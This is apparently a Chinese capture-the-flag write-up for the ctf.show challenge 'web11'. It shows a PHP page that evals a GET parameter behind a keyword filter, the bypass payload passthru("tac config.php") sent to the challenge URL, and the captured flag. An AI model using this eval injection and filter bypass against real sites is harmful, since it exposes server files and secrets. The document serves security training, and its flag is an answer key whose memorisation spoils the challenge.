web11
1
阿呆听完自己菜死了,自己呆了。决定修好漏洞,绝对不能让自己再菜死了。
解法
可知 flag 在 config.php。
<?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/system|exec|highlight|cat/i",$c)){
eval($c);
}else{
die("cmd error");
}
}else{
highlight_file(__FILE__);
}
?>
cat 会被拦截,那就用 tac,从尾到头显示文件内容。发送 GET 请求:
https://9df70e10-e53e-4962-add7-44ac09411ff5.challenge.ctf.show/?c=passthru("tac config.php");
取得 flag。
Flag
ctfshow{35fa4ab2-411b-42b1-9e45-66aa5138c836}